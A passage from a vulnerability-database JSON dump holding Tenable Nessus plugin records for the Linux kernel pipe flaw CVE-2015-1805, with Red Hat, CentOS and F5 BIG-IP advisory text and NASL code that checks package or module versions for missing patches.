reference:\"kernel-debug-debuginfo-2.6.18-406.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"kernel-debug-debuginfo-2.6.18-406.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"kernel-debug-debuginfo-2.6.18-406.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i686\", reference:\"kernel-debug-devel-2.6.18-406.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"kernel-debug-devel-2.6.18-406.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"kernel-debug-devel-2.6.18-406.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i686\", reference:\"kernel-debuginfo-2.6.18-406.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"kernel-debuginfo-2.6.18-406.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"kernel-debuginfo-2.6.18-406.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i686\", reference:\"kernel-debuginfo-common-2.6.18-406.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"kernel-debuginfo-common-2.6.18-406.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"kernel-debuginfo-common-2.6.18-406.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i686\", reference:\"kernel-devel-2.6.18-406.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"kernel-devel-2.6.18-406.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"kernel-devel-2.6.18-406.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"kernel-doc-2.6.18-406.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"kernel-headers-2.6.18-406.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"kernel-headers-2.6.18-406.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"kernel-headers-2.6.18-406.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"kernel-kdump-2.6.18-406.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"kernel-kdump-debuginfo-2.6.18-406.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"kernel-kdump-devel-2.6.18-406.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i686\", reference:\"kernel-xen-2.6.18-406.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"kernel-xen-2.6.18-406.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i686\", reference:\"kernel-xen-debuginfo-2.6.18-406.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"kernel-xen-debuginfo-2.6.18-406.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i686\", reference:\"kernel-xen-devel-2.6.18-406.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"kernel-xen-devel-2.6.18-406.el5\")) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel / kernel-PAE / kernel-PAE-debuginfo / kernel-PAE-devel / etc\");\n }\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-02-06T13:44:54", "description": "Updated kernel packages that fix one security issue and two bugs are\nnow available for Red Hat Enterprise Linux 6.4 Advanced Update\nSupport.\n\nRed Hat Product Security has rated this update as having Important\nsecurity impact. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available from the\nCVE link in the References section.\n\nThe kernel packages contain the Linux kernel, the core of any Linux\noperating system.\n\n* It was found that the Linux kernel's implementation of vectored pipe\nread and write functionality did not take into account the I/O vectors\nthat were already processed when retrying after a failed atomic access\noperation, potentially resulting in memory corruption due to an I/O\nvector array overrun. A local, unprivileged user could use this flaw\nto crash the system or, potentially, escalate their privileges on the\nsystem. (CVE-2015-1805, Important)\n\nThe security impact of this issue was discovered by Red Hat.\n\nThis update also fixes the following bugs :\n\n* The backlog data could previously not be consumed when the\naudit_log_start() function was running even if audit_log_start()\ncalled the wait_for_auditd() function to consume it. As only auditd\ncould consume the backlog data, audit_log_start() terminated\nunexpectedly. Consequently, the system became unresponsive until the\nbacklog timeout was up. With this update, audit_log_start() no longer\nterminates and the system shuts down and reboots gracefully in a\ntimely manner. (BZ#1140489)\n\n* Direct I/O writes extending a parallel file could previously race to\nupdate the size of the file. If the writes executed in the\nout-of-order manner, the file size could move backwards and push a\npreviously completed write beyond EOF, causing it to be lost. With\nthis update, file size updates are always executed in appropriate\norder, thus fixing this bug. (BZ#1218497)\n\nAll kernel users are advised to upgrade to these updated packages,\nwhich contain backported patches to correct these issues. The system\nmust be rebooted for this update to take effect.", "edition": 31, "published": "2015-07-08T00:00:00", "title": "RHEL 6 : kernel (RHSA-2015:1211)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-1805"], "modified": "2015-07-08T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:python-perf-debuginfo", "p-cpe:/a:redhat:enterprise_linux:kernel-debuginfo", "p-cpe:/a:redhat:enterprise_linux:kernel-debug-devel", "p-cpe:/a:redhat:enterprise_linux:kernel-debuginfo-common-x86_64", "p-cpe:/a:redhat:enterprise_linux:kernel-firmware", "p-cpe:/a:redhat:enterprise_linux:kernel-devel", "cpe:/o:redhat:enterprise_linux:6.4", "p-cpe:/a:redhat:enterprise_linux:kernel-debug", "p-cpe:/a:redhat:enterprise_linux:kernel-headers", "p-cpe:/a:redhat:enterprise_linux:kernel-debug-debuginfo", "p-cpe:/a:redhat:enterprise_linux:perf-debuginfo", "p-cpe:/a:redhat:enterprise_linux:kernel", "p-cpe:/a:redhat:enterprise_linux:python-perf", "p-cpe:/a:redhat:enterprise_linux:perf", "p-cpe:/a:redhat:enterprise_linux:kernel-doc"], "id": "REDHAT-RHSA-2015-1211.NASL", "href": "https://www.tenable.com/plugins/nessus/84610", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2015:1211. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(84610);\n script_version(\"2.17\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/02/05\");\n\n script_cve_id(\"CVE-2015-1805\");\n script_bugtraq_id(74951);\n script_xref(name:\"RHSA\", value:\"2015:1211\");\n\n script_name(english:\"RHEL 6 : kernel (RHSA-2015:1211)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"Updated kernel packages that fix one security issue and two bugs are\nnow available for Red Hat Enterprise Linux 6.4 Advanced Update\nSupport.\n\nRed Hat Product Security has rated this update as having Important\nsecurity impact. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available from the\nCVE link in the References section.\n\nThe kernel packages contain the Linux kernel, the core of any Linux\noperating system.\n\n* It was found that the Linux kernel's implementation of vectored pipe\nread and write functionality did not take into account the I/O vectors\nthat were already processed when retrying after a failed atomic access\noperation, potentially resulting in memory corruption due to an I/O\nvector array overrun. A local, unprivileged user could use this flaw\nto crash the system or, potentially, escalate their privileges on the\nsystem. (CVE-2015-1805, Important)\n\nThe security impact of this issue was discovered by Red Hat.\n\nThis update also fixes the following bugs :\n\n* The backlog data could previously not be consumed when the\naudit_log_start() function was running even if audit_log_start()\ncalled the wait_for_auditd() function to consume it. As only auditd\ncould consume the backlog data, audit_log_start() terminated\nunexpectedly. Consequently, the system became unresponsive until the\nbacklog timeout was up. With this update, audit_log_start() no longer\nterminates and the system shuts down and reboots gracefully in a\ntimely manner. (BZ#1140489)\n\n* Direct I/O writes extending a parallel file could previously race to\nupdate the size of the file. If the writes executed in the\nout-of-order manner, the file size could move backwards and push a\npreviously completed write beyond EOF, causing it to be lost. With\nthis update, file size updates are always executed in appropriate\norder, thus fixing this bug. (BZ#1218497)\n\nAll kernel users are advised to upgrade to these updated packages,\nwhich contain backported patches to correct these issues. The system\nmust be rebooted for this update to take effect.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2015:1211\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2015-1805\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-debug-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-debug-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-debuginfo-common-x86_64\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-firmware\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:perf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:perf-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:python-perf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:python-perf-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6.4\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/08/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/07/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/07/08\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\ninclude(\"ksplice.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^6\\.4([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 6.4\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nif (get_one_kb_item(\"Host/ksplice/kernel-cves\"))\n{\n rm_kb_item(name:\"Host/uptrack-uname-r\");\n cve_list = make_list(\"CVE-2015-1805\");\n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, \"KSplice hotfix for RHSA-2015:1211\");\n }\n else\n {\n __rpm_report = ksplice_reporting_text();\n }\n}\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2015:1211\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"x86_64\", reference:\"kernel-2.6.32-358.62.1.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"x86_64\", reference:\"kernel-debug-2.6.32-358.62.1.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"x86_64\", reference:\"kernel-debug-debuginfo-2.6.32-358.62.1.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"x86_64\", reference:\"kernel-debug-devel-2.6.32-358.62.1.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"x86_64\", reference:\"kernel-debuginfo-2.6.32-358.62.1.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"x86_64\", reference:\"kernel-debuginfo-common-x86_64-2.6.32-358.62.1.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"x86_64\", reference:\"kernel-devel-2.6.32-358.62.1.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", reference:\"kernel-doc-2.6.32-358.62.1.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", reference:\"kernel-firmware-2.6.32-358.62.1.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"x86_64\", reference:\"kernel-headers-2.6.32-358.62.1.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"x86_64\", reference:\"perf-2.6.32-358.62.1.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"x86_64\", reference:\"perf-debuginfo-2.6.32-358.62.1.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"x86_64\", reference:\"python-perf-2.6.32-358.62.1.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"x86_64\", reference:\"python-perf-debuginfo-2.6.32-358.62.1.el6\")) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel / kernel-debug / kernel-debug-debuginfo / kernel-debug-devel / etc\");\n }\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-02-01T02:04:58", "description": "The (1) pipe_read and (2) pipe_write implementations in fs/pipe.c in\nthe Linux kernel before 3.16 do not properly consider the side effects\nof failed __copy_to_user_inatomic and __copy_from_user_inatomic calls,\nwhich allows local users to cause a denial of service (system crash)\nor possibly gain privileges via a crafted application, aka an 'I/O\nvector array overrun.'", "edition": 29, "published": "2015-10-20T00:00:00", "title": "F5 Networks BIG-IP : Linux kernel vulnerability (SOL17458)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-1805"], "modified": "2021-02-02T00:00:00", "cpe": ["cpe:/a:f5:big-ip_global_traffic_manager", "cpe:/a:f5:big-ip_link_controller", "cpe:/a:f5:big-ip_advanced_firewall_manager", "cpe:/a:f5:big-ip_policy_enforcement_manager", "cpe:/a:f5:big-ip_application_security_manager", "cpe:/a:f5:big-ip_application_acceleration_manager", "cpe:/h:f5:big-ip_protocol_security_manager", "cpe:/a:f5:big-ip_local_traffic_manager", "cpe:/a:f5:big-ip_wan_optimization_manager", "cpe:/h:f5:big-ip", "cpe:/a:f5:big-ip_application_visibility_and_reporting", "cpe:/a:f5:big-ip_webaccelerator", "cpe:/a:f5:big-ip_access_policy_manager"], "id": "F5_BIGIP_SOL17458.NASL", "href": "https://www.tenable.com/plugins/nessus/86449", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from F5 Networks BIG-IP Solution SOL17458.\n#\n# The text description of this plugin is (C) F5 Networks.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(86449);\n script_version(\"2.8\");\n script_cvs_date(\"Date: 2019/01/04 10:03:40\");\n\n script_cve_id(\"CVE-2015-1805\");\n script_bugtraq_id(74951);\n\n script_name(english:\"F5 Networks BIG-IP : Linux kernel vulnerability (SOL17458)\");\n script_summary(english:\"Checks the BIG-IP version.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote device is missing a vendor-supplied security patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The (1) pipe_read and (2) pipe_write implementations in fs/pipe.c in\nthe Linux kernel before 3.16 do not properly consider the side effects\nof failed __copy_to_user_inatomic and __copy_from_user_inatomic calls,\nwhich allows local users to cause a denial of service (system crash)\nor possibly gain privileges via a crafted application, aka an 'I/O\nvector array overrun.'\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://support.f5.com/csp/article/K17458\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade to one of the non-vulnerable versions listed in the F5\nSolution SOL17458.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_access_policy_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_advanced_firewall_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_application_acceleration_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_application_security_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_application_visibility_and_reporting\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_global_traffic_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_link_controller\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_local_traffic_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_policy_enforcement_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_wan_optimization_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_webaccelerator\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/h:f5:big-ip\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/h:f5:big-ip_protocol_security_manager\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/10/19\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/10/20\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"F5 Networks Local Security Checks\");\n\n script_dependencies(\"f5_bigip_detect.nbin\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/BIG-IP/hotfix\", \"Host/BIG-IP/modules\", \"Host/BIG-IP/version\", \"Settings/ParanoidReport\");\n\n exit(0);\n}\n\n\ninclude(\"f5_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nversion = get_kb_item(\"Host/BIG-IP/version\");\nif ( ! version ) audit(AUDIT_OS_NOT, \"F5 Networks BIG-IP\");\nif ( isnull(get_kb_item(\"Host/BIG-IP/hotfix\")) ) audit(AUDIT_KB_MISSING, \"Host/BIG-IP/hotfix\");\nif ( ! get_kb_item(\"Host/BIG-IP/modules\") ) audit(AUDIT_KB_MISSING, \"Host/BIG-IP/modules\");\n\nsol = \"SOL17458\";\nvmatrix = make_array();\n\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\n# AFM\nvmatrix[\"AFM\"] = make_array();\nvmatrix[\"AFM\"][\"affected\" ] = make_list(\"11.3.0-11.6.0\");\nvmatrix[\"AFM\"][\"unaffected\"] = make_list(\"12.0.0\");\n\n# AM\nvmatrix[\"AM\"] = make_array();\nvmatrix[\"AM\"][\"affected\" ] = make_list(\"11.4.0-11.6.0\");\nvmatrix[\"AM\"][\"unaffected\"] = make_list(\"12.0.0\");\n\n# APM\nvmatrix[\"APM\"] = make_array();\nvmatrix[\"APM\"][\"affected\" ] = make_list(\"11.0.0-11.6.0\",\"10.1.0-10.2.4\");\nvmatrix[\"APM\"][\"unaffected\"] = make_list(\"12.0.0\");\n\n# ASM\nvmatrix[\"ASM\"] = make_array();\nvmatrix[\"ASM\"][\"affected\" ] = make_list(\"11.0.0-11.6.0\",\"10.1.0-10.2.4\");\nvmatrix[\"ASM\"][\"unaffected\"] = make_list(\"12.0.0\");\n\n# AVR\nvmatrix[\"AVR\"] = make_array();\nvmatrix[\"AVR\"][\"affected\" ] = make_list(\"11.0.0-11.6.0\");\nvmatrix[\"AVR\"][\"unaffected\"] = make_list(\"12.0.0\");\n\n# LC\nvmatrix[\"LC\"] = make_array();\nvmatrix[\"LC\"][\"affected\" ] = make_list(\"11.0.0-11.6.0\",\"10.1.0-10.2.4\");\nvmatrix[\"LC\"][\"unaffected\"] = make_list(\"12.0.0\");\n\n# LTM\nvmatrix[\"LTM\"] = make_array();\nvmatrix[\"LTM\"][\"affected\" ] = make_list(\"11.0.0-11.6.0\",\"10.1.0-10.2.4\");\nvmatrix[\"LTM\"][\"unaffected\"] = make_list(\"12.0.0\");\n\n# PEM\nvmatrix[\"PEM\"] = make_array();\nvmatrix[\"PEM\"][\"affected\" ] = make_list(\"11.3.0-11.6.0\");\nvmatrix[\"PEM\"][\"unaffected\"] = make_list(\"12.0.0\");\n\n\nif (bigip_is_affected(vmatrix:vmatrix, sol:sol))\n{\n if (report_verbosity > 0) security_hole(port:0, extra:bigip_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = bigip_get_tested_modules();\n audit_extra = \"For BIG-IP module(s) \" + tested + \",\";\n if (tested) audit(AUDIT_INST_VER_NOT_VULN, audit_extra, version);\n else audit(AUDIT_HOST_NOT, \"running any of the affected modules\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-06T09:30:09", "description": "Updated kernel packages that fix one security issue and several bugs\nare now available for Red Hat Enterprise Linux 5.\n\nRed Hat Product Security has rated this update as having Important\nsecurity impact. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available from the\nCVE link in the References section.\n\nThe kernel packages contain the Linux kernel, the core of any Linux\noperating system.\n\n* It was found that the Linux kernel's implementation of vectored pipe\nread and write functionality did not take into account the I/O vectors\nthat were already processed when retrying after a failed atomic access\noperation, potentially resulting in memory corruption due to an I/O\nvector array overrun. A local, unprivileged user could use this flaw\nto crash the system or, potentially, escalate their privileges on the\nsystem. (CVE-2015-1805, Important)\n\nThe security impact of this issue was discovered by Red Hat.\n\nThis update fixes the following bugs :\n\n* Due to a bug in the lpfc_device_reset_handler() function, a scsi\ncommand timeout could lead to a system crash. With this update,\nlpfc_device_reset_handler recovers storage without crashing.\n(BZ#1070964)\n\n* Due to the code decrementing the reclaim_in_progress counter without\nhaving incremented it first, severe spinlock contention occurred in\nthe shrink_zone() function even though the vm.max_reclaims_in_progress\nfeature was set to 1. This update provides a patch fixing the\nunderlying source code, and spinlock contention no longer occurs in\nthis scenario. (BZ#1164105)\n\n* A TCP socket using SACK that had a retransmission but recovered from\nit, failed to reset the retransmission timestamp. As a consequence, on\ncertain connections, if a packet had to be re-transmitted, the\nretrans_stamp variable was only cleared when the next acked packet was\nreceived. This could lead to an early abortion of the TCP connection\nif this next packet also got lost. With this update, the socket clears\nretrans_stamp when the recovery is completed, thus fixing the bug.\n(BZ#1205521)\n\n* Previously, the signal delivery paths did not clear the TS_USEDFPU\nflag, which could cause problems in the switch_to() function and lead\nto floating-point unit (FPU) corruption. With this update, TS_USEDFPU\nis cleared as expected, and FPU is no longer under threat of\ncorruption. (BZ#1193505)\n\n* A race condition in the exit_sem() function previously caused the\nsemaphore undo list corruption. As a consequence, a kernel crash could\noccur. The corruption in the semaphore undo list has been fixed, and\nthe kernel no longer crashes in this situation. (BZ#1124574)\n\n* Previously, when running the 'virsh blockresize [Device] [Newsize]'\ncommand to resize the disk, the new size was not reflected in a Red\nHat Enterprise Linux 5 Virtual Machine (VM). With this update, the new\nsize is now reflected online immediately in a Red Hat Enterprise Linux\n5 VM so it is no longer necessary to reboot the VM to see the new disk\nsize. (BZ#1200855)\n\nAll kernel users are advised to upgrade to these updated packages,\nwhich contain backported patches to correct these issues. The system\nmust be rebooted for this update to take effect.", "edition": 30, "published": "2015-06-04T00:00:00", "title": "CentOS 5 : kernel (CESA-2015:1042)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-1805"], "modified": "2015-06-04T00:00:00", "cpe": ["p-cpe:/a:centos:centos:kernel-PAE-devel", "p-cpe:/a:centos:centos:kernel-xen-devel", "p-cpe:/a:centos:centos:kernel-xen", "p-cpe:/a:centos:centos:kernel-doc", "p-cpe:/a:centos:centos:kernel-devel", "p-cpe:/a:centos:centos:kernel", "p-cpe:/a:centos:centos:kernel-debug", "p-cpe:/a:centos:centos:kernel-headers", "cpe:/o:centos:centos:5", "p-cpe:/a:centos:centos:kernel-PAE", "p-cpe:/a:centos:centos:kernel-debug-devel"], "id": "CENTOS_RHSA-2015-1042.NASL", "href": "https://www.tenable.com/plugins/nessus/83979", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2015:1042 and \n# CentOS Errata and Security Advisory 2015:1042 respectively.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(83979);\n script_version(\"2.13\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2015-1805\");\n script_bugtraq_id(74951);\n script_xref(name:\"RHSA\", value:\"2015:1042\");\n\n script_name(english:\"CentOS 5 : kernel (CESA-2015:1042)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote CentOS host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated kernel packages that fix one security issue and several bugs\nare now available for Red Hat Enterprise Linux 5.\n\nRed Hat Product Security has rated this update as having Important\nsecurity impact. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available from the\nCVE link in the References section.\n\nThe kernel packages contain the Linux kernel, the core of any Linux\noperating system.\n\n* It was found that the Linux kernel's implementation of vectored pipe\nread and write functionality did not take into account the I/O vectors\nthat were already processed when 